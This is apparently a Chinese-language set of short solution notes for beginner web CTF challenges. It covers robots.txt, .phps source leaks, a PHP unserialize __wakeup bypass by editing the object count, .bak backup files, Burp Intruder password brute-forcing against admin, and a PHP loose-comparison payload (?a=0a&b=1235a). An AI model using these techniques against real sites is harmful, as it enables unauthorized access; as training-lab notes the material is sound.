文章目录
- Training-WWW-Robots
- PHP2
- unserialize3
- view-source
- get_post
- robots
- backup
- cookie
- disabled_button
- weak_auth
- simple_php
Training-WWW-Robots
robots.txt,防爬虫,访问url+robots.txt
PHP2
phps源码泄露
>`phps`文件就是`php`的源代码文件,通常用于提供给用户(访问者)查看`php`代码,因为用户无法直接通过浏览器看到`php`文件内容,所以需要用`phps`文件代替。
>它的MIME类型为:text/html, application/x-httpd-php-source, application/x-httpd-php3-source。
admin二次url编码传入id参数
unserialize3
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=
<?php
class xctf{
public $flag = '';
public function __wakeup(){
exit('bad requests');
}
}
$a = new xctf;
echo urlencode(serialize($a));
更改对象个数
view-source
ctrl+u查看源码
get_post
robots
backup
访问index.php.bak文件
index备份文件
cookie
disabled_button
右键按钮点检查,或者ctrl+shift+c选中也可以
删掉,再点按钮
weak_auth
burp抓包,放intruder,用户名admin,密码位置添加变量
密码找个字典添加进去
123456
simple_php
<?php
show_source(__FILE__);
include("config.php");
$a=@$_GET['a'];
$b=@$_GET['b'];
if($a==0 and $a){ //弱比较,不同类型比较会发生强制类型转换,截断
echo $flag1;
}
if(is_numeric($b)){ //任意字母+数字组合,is_numeric无法识别
exit();
}
if($b>1234){ //1235a>1234,截断比较
echo $flag2;
}
?>
?a=0a&b=1235a